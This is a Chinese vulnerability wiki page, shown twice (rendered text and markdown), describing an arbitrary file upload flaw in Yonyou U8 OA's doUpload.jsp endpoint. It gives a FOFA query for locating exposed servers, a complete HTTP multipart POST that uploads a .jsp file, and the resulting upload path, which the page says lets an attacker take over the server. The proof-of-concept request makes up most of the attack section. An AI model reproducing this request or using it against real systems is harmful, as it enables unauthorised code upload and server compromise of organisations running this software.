fofamini-wiki

登录白背景

源码

用友U8 OA doUpload.jsp接口任意文件上传漏洞

一、漏洞简介

用友U8+承载了用友人十余年来为成长型企业的信息化管理所倾注的心血，它以U8财务业务一体化、U8ERP、U8All-in-One、U8+形象伴随中国经济的高速发展一路走来，见证了成长型企业信息化从7个应用模块到126个产品及行业应用。用友U8 OA uploadForm 任意文件上传漏洞，攻击者可通过该漏洞获取服务器权限。

二、影响版本

用友U8 OA

三、资产测绘

fofa"用友U8-OA"
特征

四、漏洞复现

POST /yyoa/portal/tools/doUpload.jsp HTTP/1.1
Host: xx.xx.xx.xx
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:109.0) Gecko/20100101 Firefox/119.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: multipart/form-data; boundary=---------------------------363639458542274369491015178429
Content-Length: 1508
Connection: close
Cookie: JSESSIONID=CA218004AFAADF7EC35C09307DBF7324; JSESSIONID=D58108CE272DEF63D6638B7614DBDF6F
Upgrade-Insecure-Requests: 1

-----------------------------363639458542274369491015178429
Content-Disposition: form-data; name="myfile"; filename="stc.jsp"
Content-Type: application/octet-stream

test
-----------------------------363639458542274369491015178429--

上传文件位置

/yyoa/portal/upload/1700710426319.jsp

原文: https://www.yuque.com/xiaokp7/ocvun2/cmmqled2oy8ukgmq

# 用友U8 OA doUpload.jsp接口任意文件上传漏洞

# 一、漏洞简介
用友U8+承载了用友人十余年来为成长型企业的信息化管理所倾注的心血，它以U8财务业务一体化、U8ERP、U8All-in-One、U8+形象伴随中国经济的高速发展一路走来，见证了成长型企业信息化从7个应用模块到126个产品及行业应用。用友U8 OA uploadForm 任意文件上传漏洞，攻击者可通过该漏洞获取服务器权限。

# 二、影响版本

- 用友U8 OA

# 三、资产测绘

- fofa`"用友U8-OA"`
- 特征

![image.png](./img/yckCZpAvwP1jH6n2/1696561602284-fe2584fe-59e1-49ed-80d4-fa07233f84d8-606926.png)

# 四、漏洞复现
```python
POST /yyoa/portal/tools/doUpload.jsp HTTP/1.1
Host: xx.xx.xx.xx
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:109.0) Gecko/20100101 Firefox/119.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: multipart/form-data; boundary=---------------------------363639458542274369491015178429
Content-Length: 1508
Connection: close
Cookie: JSESSIONID=CA218004AFAADF7EC35C09307DBF7324; JSESSIONID=D58108CE272DEF63D6638B7614DBDF6F
Upgrade-Insecure-Requests: 1

-----------------------------363639458542274369491015178429
Content-Disposition: form-data; name="myfile"; filename="stc.jsp"
Content-Type: application/octet-stream

test
-----------------------------363639458542274369491015178429--
```
![image.png](./img/yckCZpAvwP1jH6n2/1700710514056-84a32597-221e-4969-b6c9-1267856a1a1a-509310.png)
上传文件位置
```python
/yyoa/portal/upload/1700710426319.jsp
```
![image.png](./img/yckCZpAvwP1jH6n2/1700710615312-2dc41b1e-05b9-4682-9340-d5751a551619-281073.png)

> 原文: <https://www.yuque.com/xiaokp7/ocvun2/cmmqled2oy8ukgmq>